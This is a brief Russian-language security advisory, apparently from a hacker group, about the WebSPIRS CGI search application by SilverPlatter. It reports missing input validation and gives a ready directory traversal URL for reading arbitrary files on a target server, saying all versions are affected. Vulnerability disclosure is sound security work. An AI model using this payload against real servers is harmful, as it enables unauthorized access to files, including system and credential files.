-----------UkR security team advisory ------------
WebSPIRS (SilverPlatter's Information Retrieval System for WWW). Это CGI-приложение, которое доступно на всех forms-поддерживающих браузерах, таких как Netscape, для поиска в SilverPlatter (SP) электронной справочной библиотеке (ERL) баз данных, доступных по интернету.
http://www.silverplatter.com.
Проблема заключается в некорректной проверке отсылаемой скрипту информации.
Использование: www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../путь/к/файлу
Уязвимость во всех версиях данного скрипта.
Автор: UKR-XblP
